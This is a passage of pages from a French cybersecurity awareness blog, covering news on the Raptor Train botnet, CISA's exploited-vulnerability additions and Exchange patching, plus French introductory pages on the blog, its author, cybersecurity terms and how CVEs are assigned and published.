La Canary campaign focused on ActionTec PK5000 modems, Hikvision IP cameras, as well as Shenzhen TVT NVRs and ASUS routers. This campaign is notable for its use of a multi-step infection chain. The first step is to download a bash script, which connects to a level 2 payload server to retrieve malware called Nosedive, followed by a second stage bash script.

Each new stage then attempts to download and run additional scripts at regular intervals, every 60 minutes, to maintain the infection.

<figure><img src="/files/NLaJ7aEC8EnnROScGF9h" alt=""><figcaption><p><strong>Canary Campaign July 2023</strong><br><em>source: Black Lotus Labs</em></p></figcaption></figure>

## Exploits and Vulnerabilities Used

The Raptor Train operates over 20 different device types, including brands like TP-Link, ASUS, Hikvision, and Synology. Hackers take advantage of zero-day (unknown and unpatched) flaws and known vulnerabilities to penetrate these devices. This allows rapid propagation of the botnet, which remains resistant to traditional defense solutions thanks to the absence of persistence mechanisms in its payloads.

## Impact and Targets

The botnet mainly targets strategic sectors such as critical infrastructure, telecommunications, the military sector, and higher education, particularly in the United States and Taiwan. As of June 2023, the Raptor Train already controlled 60,000 active devices, but with campaigns such as Canary and Oriole, this number has increased to over 260,000 compromised devices. The United States and other countries were also affected, with nearly 385,000 devices in the United States alone registered in the botnet's database.

In a publication in "JOINT Cybersecurity Advisory" on September 18, 2024, the following tables were published:

## “BOTNET” device by country

<figure><img src="/files/ACZWHjtpo6f2QXxgybME" alt=""><figcaption><p>Botnet devices per country<br>Source: FBI communication</p></figcaption></figure>

## “BOTNET” device by continent

<figure><img src="/files/ZHmFkVMtOu6LnpW0fPPA" alt=""><figcaption><p>Botnet devices per continent<br>Source: FBI communication</p></figcaption></figure>

## “BOTNET” device by processor architecture

<figure><img src="/files/RA9dRWk8VqTxVapK4IdV" alt=""><figcaption><p>Botnet devices by processor architecture<br>Source: FBI communication</p></figcaption></figure>

## Reactions and Countermeasures

Faced with the rise of Raptor Train, American authorities, with the collaboration of international organizations, carried out coordinated operations to dismantle the botnet's infrastructure. Using court orders, the FBI took control of some C2 servers and sent commands to remove malware from compromised devices. However, the botnet operators responded with an unsuccessful DDoS attack attempt against American infrastructure. The FBI and other agencies continue to monitor botnet activity, and mitigation efforts are underway to help device owners secure their networks.

## Recommended mitigation measures

The FBI recommends that network defenders adopt the following actions to mitigate the threats posed by adversaries who use botnets for malicious cyber activity. These measures aim to prevent IoT devices from becoming part of a botnet, as well as protect networks already infected by botnets.

1. Disable unused services and ports: This includes features such as automatic configuration, remote access or file sharing protocols. Routers and IoT devices may offer features such as Universal Plug and Play (UPnP), remote management options, or file sharing services, which can be exploited by attackers to gain initial access or propagate malware. malware to other network devices. Disable these features if they are not needed.
2. Implement network segmentation: Ensure IoT devices are isolated into network segments to reduce risk in the event of a compromise. Use the principle of least privilege to provide devices with only the connectivity necessary to perform their function.
3. Monitor high network traffic volumes: DDoS attacks emanating from botnets may initially appear to be normal traffic. It is therefore crucial to define, monitor and prepare to detect any abnormal traffic. Monitoring can be done through firewalls or intrusion detection systems. Certain network solutions, such as proxies, can help mitigate DDoS incidents.
4. Apply patches and updates: Regularly install software updates and security patches on IoT devices. Regular patches address known vulnerabilities. If possible, use automatic update channels from trusted sources. Do not trust emails that claim to deliver software updates as attachments or links to insecure sites.
5. Replace default passwords with secure passwords: Many IoT products include administrative passwords in addition to other user accounts. Ensure that all passwords are changed from their default values, and enforce a strong password policy. If possible, disable password hints.
6. Schedule device reboots: Restarting a device terminates all running processes, which can eliminate certain types of malware, such as "fileless" malware that runs only in the host's memory . If a device is compromised, consider restarting affected devices remotely, or even manually if necessary.
7. Replace end-of-life equipment: Obsolete or end-of-life devices should be replaced with devices supported by vendors with regular updates and adequate technical support measures.

## Conclusion

The Raptor Train remains an active threat, and although efforts have been made to disrupt its operations, its sophisticated structure and ability to exploit new vulnerabilities make it a priority target for global information security forces. Updating IoT devices and having appropriate defenses in place is crucial to limiting future infections.

***

## Definitions of technical terms

To help better understand the technical details covered in this article, here is a series of key definitions. If you are unfamiliar with some of the concepts, this section will provide you with simple, accessible explanations of essential terms related to cyberattacks, botnets, and computer vulnerabilities. These definitions will help shed light on how the Raptor Train works and the steps the FBI is taking to dismantle this threat.

### 1. **Botnet**

{% hint style="info" %}
A botnet is a network of computers or devices infected with malware, which are controlled remotely by a cybercriminal called a bot herder. These infected devices, often called bots or zombies, perform malicious tasks such as Distributed Denial of Service (DDoS) attacks, stealing data, or sending spam. Users of infected devices are generally unaware that their systems are part of a botnet.
{% endhint %}

**Source** : [**Kaspersky**](https://www.kaspersky.com/resource-center/threats/botnet-attacks)

### 2. DDoS (Distributed Denial of Service)

{% hint style="info" %}
A distributed denial of service (DDoS) attack is an attempt to make an online service or network unavailable by overwhelming it with a stream of traffic from multiple sources. In a DDoS attack, thousands of compromised computers (often belonging to a botnet) are used to flood a target with a very high volume of requests, overloading resources and making the service inaccessible.
{% endhint %}

**Source** : [**Cloudflare**](https://www.cloudflare.com/fr-fr/learning/ddos/what-is-a-ddos-attack/)

### 3. **IoT (Internet of Things)**

{% hint style="info" %}
The Internet of Things (IoT) refers to the interconnection of physical devices (such as cameras, routers, home appliances) via the Internet, which can collect and exchange data. These devices are often prime targets for cyberattacks due to their often less robust security.
{% endhint %}

**Source** : [**IBM**](https://www.ibm.com/topics/internet-of-things)

### 4. Zero-Day Vulnerability

{% hint style="info" %}
A zero-day flaw is a vulnerability in software that is exploited by cybercriminals before the software developer or security provider is aware of its existence and has time to patch it. A zero-day attack is particularly dangerous because there is no patch or update yet to protect users.
{% endhint %}

**Source** : [**Trend Micro**](https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability#:~:text=A%20zero%2Dday%20vulnerability%20is,called%20a%20zero%2Dday%20exploit.)

### 5. **C2 (Command and Control)**

{% hint style="info" %}
In the context of cyberattacks, a C2 (Command and Control) server is used by cybercriminals to communicate with compromised devices in a botnet. These servers send instructions to infected devices and receive stolen data, while allowing attackers to control the botnet.
{% endhint %}

**Source** : [**Fortinet**](https://www.fortinet.com/lat/resources/cyberglossary/command-and-control-attacks)

### **Sources**&#x20;

* [The Hacker News](https://thehackernews.com/2024/09/new-raptor-train-iot-botnet-compromises.html)
* [Bleeping Computer](https://www.bleepingcomputer.com/news/security/flax-typhoon-hackers-infect-260-000-routers-ip-cameras-with-botnet-malware/)
* [Gov Info Security](https://www.govinfosecurity.com/raptor-train-botnet-infects-260000-devices-globally-a-26327)


# Active exploitation of TP-Link, Apache and Oracle vulnerabilities detected

Date: 02-05-2023

<figure><img src="/files/pjXgIP577C2FJUrU4MTG" alt=""><figcaption></figcaption></figure>

\
The US Cybersecurity and Infrastructure Security Agency (CISA) has updated the Catalog of Known Exploited Vulnerabilities (KEV) with three new vulnerabilities, due to evidence of ongoing exploitation.

Identified security vulnerabilities include:

* [**CVE-2023-1389**](https://nvd.nist.gov/vuln/detail/CVE-2023-1389) (score CVSS : 8,8) - TP-Link Archer AX-21 Command Injection Vulnerability
* [**CVE-2021-45046**](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) (score CVSS : 9,0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability
* [**CVE-2023-21839**](https://nvd.nist.gov/vuln/detail/CVE-2023-21839) (score CVSS : 7,5) - Oracle WebLogic Server Unspecified Vulnerability

{% hint style="info" %}
CVE:\
\
The acronym CVE, for Common Vulnerabilities and Exposures in English, designates a public list of computer security vulnerabilities. When we talk about a CVE, we generally refer to a security vulnerability that has been assigned a CVE identifier.

Security advisories published by vendors and researchers almost always mention at least one CVE identifier. CVEs help professionals coordinate their efforts to prioritize and resolve vulnerabilities, and thus strengthen the security of computer systems.

\
SOURCE: [**REDHAT**](https://www.redhat.com/fr/topics/security/what-is-cve)
{% endhint %}

CVE-2023-1389 concerns a command injection vulnerability affecting TP-Link Archer AX-21 routers, which could be exploited to enable remote code execution. Trend Micro's Zero Day Initiative reported that since April 11, 2023, malicious actors associated with the Mirai botnet have been actively exploiting this vulnerability.

The second vulnerability added to the KEV catalog is CVE-2021-45046, which concerns remote code execution in the Apache Log4j2 logging library, discovered in December 2021.

{% hint style="success" %} <mark style="color:green;">**An article is available from Be-Hacktive:**</mark>\
\=> LOG4J: The vulnerable bookstore that is shaking the planet
{% endhint %}

Exactly how this specific vulnerability is exploited is not yet clear. However, GreyNoise has collected data indicating exploitation attempts from as many as 74 unique IP addresses over the past 30 days. This also includes CVE-2021-44228 (also known as Log4Shell).

{% hint style="success" %}
An article is available from Be-Hacktive:

\=> <mark style="color:green;">**LOG4SHELL: COME, SEE, LIVE**</mark>
{% endhint %}

The latest addition to the list is a high-severity bug found in Oracle WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0, which could potentially allow unauthorized access to sensitive information . Oracle released fixes for this issue in January 2023.

> “Oracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server,” CISA said.

Although proof-of-concept (PoC) exploits for the flaw exist, there do not appear to be any public reports of malicious exploitation.

<figure><img src="/files/Wdbeeh8VUsycShhEQTBX" alt=""><figcaption><p>No IP observed with attempted exploitation of CVE-2023-21839</p></figcaption></figure>

Federal Civilian Executive Branch (FCEB) agencies are required to implement vendor-provided patches by May 22, 2023, to protect their networks against these active threats.

This recommendation comes just over a month after VulnCheck revealed that nearly four dozen security vulnerabilities, likely used as weapons in the wild in 2022, are missing from the KEV catalog.

Among the 42 vulnerabilities, an overwhelming majority are linked to exploitation by botnets similar to Mirai (27), followed by ransomware gangs (6) and other threat actors (9).

<figure><img src="/files/Anv62HbQJUwsdjLuLIvR" alt=""><figcaption><p>Report Result: The VulnCheck 2022 Exploited Vulnerability Report - Missing CISA KEV Catalog Entries</p></figcaption></figure>


# Microsoft stresses the urgency of patching Exchange servers locally

Date: 27-01-2023

## Patching et Monitoring

<figure><img src="/files/hjJgKLsYty40GFGRm2ll" alt=""><figcaption></figcaption></figure>

Microsoft today urged its customers to keep their "on-premises Exchange servers" patched by applying the latest supported Cumulative Update (CU) so that they are always ready to deploy an update emergency safety.

{% hint style="info" %}
**Patch Management:**\
Patch management involves identifying and deploying software updates, also called “fixes” or “patches,” to various endpoints, including computers, mobile devices, and servers.

Patches are typically distributed by software developers to fix known security vulnerabilities or technical issues. They also allow you to add new features and functions to the application. These short-term solutions are intended to be used until the next version of the software is released.

Definition: [**Crowdstrike**](https://www.crowdstrike.fr/cybersecurity-101/patch-management/)
{% endhint %}

[Tony Redmond, le MVP de Microsoft](https://mvp.microsoft.com/en-us/PublicProfile/9501) (Most Valuable Professional), says the Exchange server update process is "simple" and recommends always running the script [**Exchange Server Health Checker** ](https://microsoft.github.io/CSS-Exchange/Diagnostics/HealthChecker/)after installing updates.

{% hint style="warning" %}
Editor's note: For the simplicity of the Windows update process, everything is relative because many system administrators could contest it with (very) good arguments.
{% endhint %}

The Exchange Server Health Checker script helps detect common configuration issues that are known to cause performance issues and other long-lasting issues that are caused by a simple configuration change in an Exchange environment. It also helps collect useful information about your server to speed up the process of collecting common information about your server.

## Exchange vulnerabilities still relevant

<figure><img src="/files/zRjLBz0I5o3dZHS4XOSD" alt=""><figcaption></figcaption></figure>

Today's warning comes after Microsoft also asked administrators to continually patch on-premises Exchange servers after releasing emergency out-of-band security updates to fix ProxyLogon vulnerabilities that were exploited in attacks two months before the release of official patches.

As of March 2021, at least ten hacker groups were using ProxyLogon exploits for various purposes, one of them being a Chinese-sponsored threat group tracked by Microsoft under the name Hafnium.

To show the sheer number of organizations exposed to such attacks, the Netherlands Institute for Vulnerability Disclosure (DIVD) found 46,000 servers unprotected against ProxyLogon vulnerabilities a week after Microsoft security updates were released .

Most recently, in November 2022, Microsoft fixed another series of Exchange bugs known as ProxyNotShell, which allows privilege escalation and remote code execution on compromised servers, two months after the first detection of wild exploitation.

<figure><img src="/files/5ATUYHR7FDLHZ6SC1rNW" alt="Les serveurs Exchange non protégés contre ProxyNotShell - Source: ShadowServer"><figcaption><p>Exchange servers not protected against ProxyNotShell - Source: ShadowServer</p></figcaption></figure>

To put things into perspective, earlier this month, security researchers at the Shadowserver Foundation discovered that more than 60,000 Microsoft Exchange servers exposed online are still vulnerable to attacks leveraging ProxyNotShell exploits targeting the CVE-2022-41082 vulnerability. Remote Code Execution (RCE).

{% hint style="info" %}
CVE:

The acronym CVE, for Common Vulnerabilities and Exposures in English, designates a public list of computer security vulnerabilities. When we talk about a CVE, we generally refer to a security vulnerability that has been assigned a CVE identifier. Security advisories published by vendors and researchers almost always mention at least one CVE identifier. CVEs help professionals coordinate their efforts to prioritize and resolve vulnerabilities, and thus strengthen the security of computer systems.

\
SOURCE: [**REDHAT**](https://www.redhat.com/fr/topics/security/what-is-cve)
{% endhint %}

To make matters worse, a search on Shodan shows a huge number of Exchange servers exposed online, thousands of which are still waiting to be secured against attacks targeting the ProxyShell and ProxyLogon flaws, among the most exploited vulnerabilities in 2021/2022.

{% hint style="info" %}
Shodan:

Shodan is a website specializing in the search for objects connected to the Internet, and therefore having an IP address visible on the network. It allows you to find a variety of web servers, routers as well as many peripherals such as printers or cameras. Such a request is processed with a simple analysis of the HTTP header returned by the device or server. It is then possible to retrieve lists of specific elements. For each result, we find the IP address of the server as well as other types of sensitive but accessible information.\
\
SOURCE: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Shodan_\(site_web\))
{% endhint %}


# BE-Hacktive

Bienvenu sur le blog qui vous permettra d'apprendre et de comprendre la cybersécurité sous plusieurs formes.

![](/files/-Mk9x8gRBTYCAs9FoqkM)

La **CYBERSECURITE**, un mot commun très en vogue ces derniers temps mais qui reste assez vague et peu compris. BE HACKTIVE est un blog d’apprentissage en cybersécurité qui abordera les différents sujets liés à la thématique de la sécurité informatique via des articles, tutoriels, vidéos,...

## L'apprentissage

Pour apporter un maximum d’informations à différents profils, je vous propose un système de capsule. Chaque capsule répondra à plusieurs questions et thématiques liées à la cybersécurité.

Prenons l’exemple de la première capsule qui aura le thème de la sensibilisation à la cybersécurité. Voici une liste non exhaustive des sujets :&#x20;

* **Phishing/Hameçonnage**
* **Malwares/Logiciels malveillants**
* **Passwords/Les mots de passe**

Cette thématique fera la tour des sujets qui vous permettront de comprendre les différentes menaces que chaque utilisateur/compagnie encourt et d’améliorer vos connaissances dans ce domaine.

Il vous sera bien évidemment demandé de participer en posant des questions, en proposant des sujets ou encore en donnant votre avis.

## Envoyer votre question

Si vous avez la moindre question par rapport à la cybersécurité, n'hésitez pas à me contacter via le lien suivant:

* [J'ai une question ❓](/french/contact)

Pour conclure cette introduction, pensez-vous avoir déjà été une cible de cyberattaques ?

![](/files/-MkYyHM4w9XREGy1SsHK)


# A propos de l'auteur et du projet

## Bonjour

Je me présente **Alaaedine Chatri,** consultant en cybersécurité chez [Excellium Services S.A](https://excellium-services.com/) et hacker éthique.&#x20;

Généralement, quand je me présente de cette manière, une des premières questions que l’on me pose est:&#x20;

> *Peux-tu hacker un compte Facebook/Instagram/Snap ?* &#x20;

**🚨 Alerte Spoiler**: La réponse est OUI et NON. Je vous donnerai bien sûr une explication plus détaillée par la suite.

Etant passionné par la cybersécurité et par le hacking, j'avais envie de partager tout ça. Cela fait plusieurs mois (plus d’un an pour être plus précis) que l’idée de base m’est venue. Il a fallu plusieurs tentatives avant que vous puissiez lire ces quelques lignes.&#x20;

> Vas-tu enfin nous expliquer le but de ton projet au lieu de nous raconter ton histoire ?&#x20;

Oui ! Le projet a pour objectif de rendre la cybersécurité accessible à tout un chacun en allant de vos grands-parents à vos enfants en passant par le poisson rouge de la voisine mais aussi pour ceux qui ont déjà des bases en sécurité informatique. **Le tout en français chers lecteurs**.

## Curriculum vitæ

Pour ceux qui aimeraient me connaitre un peu plus 😀

### Etudes

* CESS en Sciences à l'Athénée Emile Bockstael
* Bachelier en informatique de gestion à la HEB-ESI
* Master en Sciences informatiques à l'ULB (Université libre de Bruxelles) - IA et Sécurité

### Expériences

Voici un petit résumé de mes expériences professionnelles, que vous pouvez retrouver 👉 [ICI ](https://www.linkedin.com/in/alaaedine-chatri-284b22102/)👈: &#x20;

* SOC Engineer chez Sopra Steria
* Pentester chez Nviso
* Pentester et Team Leader chez Redcatus
* Consultant en cybersécurité et Delivery Manager chez Excellium Services&#x20;

### Formation et Certifications

* SEC560: Network Penetration Testing and Ethical Hacking
* GIAC Penetration Tester (GPEN)
* Offensive Security Certified Professional - En cours


# Table des matières

Les topics présents dans le blog sont repris ci-dessous.

## Synopsis

| Titre                                                                          | Description                                                                              |
| ------------------------------------------------------------------------------ | ---------------------------------------------------------------------------------------- |
| [**Technologie dans le temps**](/french/synopsis/la-technologie-dans-le-temps) | L'évolution de la technologie dans le temps qui amène à la question de la cybersécurité. |
| [**Cybersécurité**](/french/synopsis/cybersecurite)                            | Définition des termes liés à la cybersécurité et au cybercrime.                          |

## Capsules

### Capsule 1 - Sensibilisation

| Titre                                                                      | Description                                                                              |
| -------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------- |
| [**Phishing**](/french/capsule-1-sensibilisation/phishing)                 | Définition, origine, évolution, technique et protection. Tout sur le phishing            |
| [**Malware**](/french/capsule-1-sensibilisation/malware)                   | Définition, origine, évolution, catégories et RANSOMWARE sont abordés dans cette partie. |
| [**Passowrds**](/french/capsule-1-sensibilisation/passwords-mots-de-passe) | Définition, évolution, statistiques et protection.                                       |

## Articles

| Titre                                                                                                                                                                  | Description                                                                                                    |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- |
| [**Suis-je une victime des fuites de données ?**](/french/articles/suis-je-victime-des-fuites-de-donnees)                                                              | Vérifier si ses données sont sur le net et comment réagir.                                                     |
| [**LOG4J: La librairie vulnérable qui secoue la planète**](/french/articles/log4j-la-librairie-vulnerable-qui-secoue-la-planete)                                       | Définition et explication des problématiques liés à Log4j.                                                     |
| [**LOG4SHELL: VENI,VIDI,VICI**](/french/articles/log4shell-veni-vidi-vici)                                                                                             | Comprendre, détecter et exploiter Log4shell.                                                                   |
| [**Microsoft insiste sur l'urgence de patcher les serveurs Exchange en local**](/french/news/microsoft-insiste-sur-lurgence-de-patcher-les-serveurs-exchange-en-local) | Avertissement urgent de Microsoft afin de prévenir de l'importance des mise à jour pour les serveurs Exchange. |

## News

| Titre                                                                                                                                                                  | Description                                                                                                                                                                                                                                                                                                                                                                                                   |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| [**Microsoft insiste sur l'urgence de patcher les serveurs Exchange en local**](/french/news/microsoft-insiste-sur-lurgence-de-patcher-les-serveurs-exchange-en-local) | Microsoft a insisté aujourd'hui auprès de ses clients pour qu'ils maintiennent leurs "serveurs Exchange sur site" **patchés** en appliquant la dernière [**mise à jour cumulative (CU)**](https://learn.microsoft.com/fr-fr/troubleshoot/windows-client/deployment/standard-terminology-software-updates) prise en charge afin qu'ils soient toujours prêts à déployer une mise à jour de sécurité d'urgence. |


# Contact

Pour toute question, n'hésitez pas à m'envoyer un mail via le formulaire de contact ci-dessous ou via un des réseaux sociaux BE-Hacktive.

{% embed url="<https://forms.gle/2Yco52zKQ2kihjfh6>" %}


# Technologie dans le temps

La technologie a évolué et continuer à évoluer avec les bons et mauvais côtés que cela puisse avoir.

## Evolution des technologies

Le progrès technologique n'est pas la seule chose qui augmente à un rythme exponentiel, la vitesse à laquelle les technologies nouvellement commercialisées sont adoptées par les consommateurs s'accélère également.&#x20;

Dans le monde moderne, grâce à la connectivité accrue, à la communication instantanée et aux systèmes d'infrastructure déjà en place, les nouvelles idées et les nouveaux produits peuvent se répandre à une vitesse jamais vue auparavant, ce qui permet à un nouveau produit d'arriver dans les mains des consommateurs en un clin d'œil.&#x20;

Voici un graphique qui met en avant le temps nécessaire pour que les technologies citées atteignent 50 millions d’utilisateurs (*Réf*: [Visual Capitalist](https://www.visualcapitalist.com/)):

![Le nombre d'années nécessaires pour qu'une technologie atteignent 50 millions d'utilisateurs](/files/-MkDIzNuvfQgNKpxkOJe)

Avant l'arrivée d'Internet et de la digitalisation, l'utilisation d'un produit ne pouvait se répandre qu'à la vitesse à laquelle vous pouviez fabriquer le bien physique. Il vous fallait d'abord plusieurs millions de dollars/francs, une usine, une main-d'œuvre et des stocks. Ensuite, une fois que le produit était prêt à être distribué, il fallait de la publicité de masse, du bouche-à-oreille, des canaux de vente et une couverture médiatique pour avoir une chance.&#x20;

Dans notre graphe nous pouvons voir que les automobiles ont mis 62 ans pour être adoptées par 50 millions d'utilisateurs. Il a fallu 28 ans pour que les cartes de crédits soient utilisées par 50 millions de personnes, 22 ans pour la télévision, 12 pour les téléphones portables et seulement 19 jours pour Pokémon Go.&#x20;

## L'ère moderne

Dans l'ère moderne, il y a donc des nouveaux produits qui ne nécessitent aucune production physique comme les applications web ou sur smartphone. Il suffit de produire un morceau de code utile qui peut être répliqué ou réutilisé indéfiniment à un coût marginal proche de zéro, et il peut se répandre comme une traînée de poudre.

Les applications permettent plusieurs facilités comme :

* L’accès aux informations
  * Les médias ont leurs applications pour transmettre les nouvelles
* La communication
  * On peut se parler par email, par messagerie ou encore par vidéoconférence
* Les paiements&#x20;
  * Les e-commerces ont facilité les achats en ligne

Une étude européenne montre qu’en 2019, 89% des personnes âgées de 16 à 74 ans dans l'UE avaient utilisé internet, dont 72% avaient acheté ou commandé des biens ou des services pour un usage privé. (*Réf*: [Eurostat](<https://ec.europa.eu/eurostat/ >))

Les applications et internet font donc partie de notre vie au quotidien que ce soit pour des raisons professionnelles ou personnelles.&#x20;

Nous les utilisons pour envoyer un message à notre famille sur un groupe WhatsApp, nous achetons un cadeau sur Amazon ou encore nous envoyons et recevons des mails sur notre ordinateur, smartphone ou tablettes. Nous pouvons donc dire que cette évolution apporte beaucoup de points positifs car les technologies peuvent être plus rapidement déployées et plus facilement accessible à un grand nombre d’utilisateurs mais il y a toujours un côté obscur :

![Cette image cache une double signification (explication dans un prochain épisode)](/files/-MkFRU1E51XwDXxa_vps)

Nous allons éclairer cette obscurité tout au long de notre voyage ensemble.


# Cybersécurité

## Définition

### Cybersécurité

Tout d’abord, nous allons définir quelques notions importantes :&#x20;

* Agence nationale de la sécurité des systèmes d’information ([**ANSSI**](https://www.ssi.gouv.fr/entreprise/glossaire/c/#:~:text=Cybers%C3%A9curit%C3%A9\&text=La%20cybers%C3%A9curit%C3%A9%20fait%20appel%20%C3%A0,en%20place%20d'une%20cyberd%C3%A9fense))&#x20;

{% hint style="success" %}
La **cybersécurité** fait appel à des techniques de sécurité des systèmes d’information et s’appuie sur la lutte contre la cybercriminalité et sur la mise en place d’une cyberdéfense.
{% endhint %}

* Centre for Cybersecurity Belgium ([**CCB**](https://ccb.belgium.be/fr))

{% hint style="success" %}
La **cybersécurité** est le résultat d’un ensemble de mesures de sécurité qui doivent minimiser le risque d’accès perturbé et non-autorisé aux systèmes d’information et de communication.
{% endhint %}

En résumé, la cybersécurité permet de protéger les sociétés et les utilisateurs de cyberattaques et des cybercriminels.

### Cybercriminalité

{% hint style="success" %}
La **cybercriminalité** regroupe toutes les infractions pénales susceptibles de se commettre sur ou au moyen d’un système informatique généralement connecté à un réseau.
{% endhint %}

La cybercriminalité se décompose en 3 types d’infractions :

* Les infractions spécifiques aux technologies de l’information et de la communication :
  * Les infractions aux cartes bancaires
  * Interception de données
* Les infractions liées aux technologies de l’informations et de la communication :
  * Pédopornographie
  * Incitation au terrorisme et à la haine raciale sur internet
  * Atteintes aux personnes ou aux biens
* Les infractions facilitées par les technologies de l’information et de la communication :
  * Escroqueries en ligne
  * Contrefaçon&#x20;
  * Violation de propriété intellectuelle

{% hint style="success" %}
Un **cybercriminel** est par définition une personne qui commet avec ou sans intention une (ou plusieurs) infraction(s) cités au-dessus sans autorisation explicite du tiers concerné, quel que soit l’intention et l’objectif poursuivis.
{% endhint %}

Le but final d'un cybercriminel pourrait être très diversifié :

* Gagner de l’argent
* Terroriser la population
* S’attaquer à un état dans un but politique, militaire ou d’espionnage
* Montrer ses capacités ou pour un défi

### Cyberattaque

{% hint style="success" %}
Une **cyberattaque** cible les Systèmes d’Information (SI) ou les entreprises dépendant de la technologie et de réseaux afin de voler, modifier ou détruire un système sensible.
{% endhint %}

Nous avons déjà été confrontés directement ou indirectement à des cyberattaques :

* Le mail d’une personne que nous connaissons mais avec laquelle nous n’avons plus eu de contact depuis un long moment. Dans ce mail elle nous demande de l’aider financièrement car elle est malade et sans argent.
* Le mail qui nous annonce que nous avons participé à un concours et que nous avons gagné le dernier smartphone ou de l’argent.
* Un sms qui nous demande de nous connecter pour récupérer notre colis à la poste.
* Un appel d’un numéro étranger.

![](/files/-MkK5MisUzRwi44ZnbUe)

Maintenant vous savez ce qu’est la cybersécurité et le cybercriminel. Mon but final étant de pouvoir apporter des réponses à vos questions et des outils pour développer ce domaine dans le monde francophone. Beaucoup de littérature existe en anglais pour la théorie et la pratique, et je voudrais la rendre accessible plus facilement aux lecteurs francophones.


# CVE

Common Vulnerabilities and Exposures

<figure><img src="/files/aq28xNTkXIynrAAoH5eQ" alt=""><figcaption></figcaption></figure>

## Introduction&#x20;

Les CVEs, ou Common Vulnerabilities and Exposures, sont des identifiants uniques attribués à des vulnérabilités spécifiques de logiciels ou de systèmes. Leur création vise à standardiser la manière dont les vulnérabilités sont référencées et partagées dans la communauté de la cybersécurité. L'initiative CVE a été lancée par le MITRE Corporation en 1999 pour faciliter le partage d'informations critiques sur les failles de sécurité, permettant ainsi aux organisations de mieux se protéger contre les cybermenaces.

## Fonctionnement des CVEs

Les CVEs sont attribuées par des organisations appelées CVE Numbering Authorities (CNAs). Une fois qu'une vulnérabilité est identifiée, elle est soumise à un CNA qui vérifie son authenticité avant de lui attribuer un identifiant unique. Ce processus garantit que chaque CVE est unique et que les informations sont partagées de manière standardisée.

La base de données CVE, maintenue par le MITRE, centralise toutes les vulnérabilités enregistrées, permettant aux chercheurs en sécurité et aux professionnels IT de consulter et de suivre les failles connues. Chaque CVE contient une description de la vulnérabilité, des informations sur les logiciels ou systèmes affectés, et des références à des correctifs ou solutions de contournement.

<figure><img src="/files/w8PETSu9vCtSegvYZFtB" alt=""><figcaption><p>CVE.MITRE.ORG</p></figcaption></figure>

## Importance des CVEs

Les CVEs jouent un rôle crucial dans la gestion des risques de sécurité. En identifiant et en cataloguant les vulnérabilités, elles permettent aux organisations de prioriser les mises à jour de sécurité et les correctifs. En comprenant quelles vulnérabilités existent et comment elles peuvent être exploitées, les entreprises peuvent mieux protéger leurs systèmes contre les cyberattaques.

Les mises à jour et patches de sécurité sont souvent déclenchés par des CVEs. Lorsqu'une nouvelle vulnérabilité est découverte, les développeurs travaillent rapidement pour créer des correctifs qui sont ensuite déployés pour atténuer les risques.

### Nombre de CVEs entre 2009 et 2023

D'après une étude de STATISTA 2024, le nombre de vulnérabilités et d'expositions courantes en matière de sécurité informatique (CVE) est en augmentation.

<figure><img src="/files/LwzW1ihA8ZYoaHd7gaUY" alt=""><figcaption><p>Nombre de vulnérabilités et d'expositions courantes en matière de sécurité informatique (CVE) dans le monde de 2009 à 2023</p></figcaption></figure>

## Comment Publier un CVE

Soumettre une nouvelle vulnérabilité pour l'attribution d'un CVE suit un processus bien défini. Les étapes incluent la découverte de la vulnérabilité, la documentation complète des détails techniques, et la soumission à un CNA pour vérification. Une fois validée, la vulnérabilité reçoit un numéro CVE et est ajoutée à la base de données.

Il suffit de se rendre sur le site **<https://cveform.mitre.org>** et d'enregistrer son CVE, et c'est tout?

<figure><img src="/files/YKMvnzOPKLgccPUSJDS4" alt=""><figcaption></figcaption></figure>

Pas vraiment. Tout d'abord, on doit remplir un certain nombre d'informations.

<figure><img src="/files/iBOnukzDNn5eyOgMhr9L" alt=""><figcaption></figcaption></figure>

La meilleure ressource pour comprendre et compléter le formulaire:

* &#x20;[**"Key Details Phrasing" by Jonathan Evans, MITRE**](https://cveproject.github.io/docs/content/key-details-phrasing.pdf)

Après avoir rempli le formulaire web, on reçoit une confirmation que le(s) CVE(s) est(sont) enregistré(s) et on obtient un numéro comme CVE-YEAR-NUMBER (CVE-2024-XXXXX). Ce ne sera pas publié tant qu'on n'a pas envoyé une publication pour la vulnérabilité, donc en attendant on peut/doit communiquer avec le vendeur pour que le problème soit résolu. La publication peut être effectuée par le fournisseur si la réponse est présente dans le délai qu'on a choisi, sinon le publier nous-même:

* Sur votre blog
* Via Exploit-DB
* etc...

<mark style="color:yellow;">**❗❗❗**</mark>**&#x20;**<mark style="color:red;background-color:yellow;">**ATTENTION**</mark>**&#x20;**<mark style="color:yellow;">**❗❗❗**</mark>

Il est **TRES fortement**  déconseiller de publier vous-même sans avoir d'abord essayé à plusieurs reprises d'établir un contact avec le vendeur et de vous assurer que ce dernier comprend réellement la vulnérabilité.&#x20;

**Il s'agit là d'un point essentiel, les CVE étant censés contribuer à améliorer la sécurité et non à la réduire.**

## Informer CVE de votre publication

Dernière étape : Retournez sur <https://cveform.mitre.org/>, mais cette fois-ci, sélectionnez "Notify CVE About a Publication". Partagez le lien vers votre article. L'équipe CVE vérifie la publication et met à jour sa base de données, consolidant ainsi votre contribution.

<figure><img src="/files/OM8FVrDtlnEbTRIKHfsV" alt=""><figcaption></figcaption></figure>

## Conclusion

Les CVEs sont essentielles pour maintenir la sécurité des systèmes informatiques. En standardisant la manière dont les vulnérabilités sont identifiées et partagées, elles aident à prévenir les cyberattaques et à protéger les données sensibles. Pour ceux qui souhaitent approfondir leurs connaissances, de nombreuses ressources sont disponibles pour explorer le sujet plus en détail.

* [**MITRE CORPORATION - CVE**](https://cve.mitre.org/)
* [**NATIONAL VULNERABILITY DATABASE - NIST**](https://nvd.nist.gov/)
* [**CVEDetails.com**](https://cvedetails.com/)


# ESKOOLY (FR version)

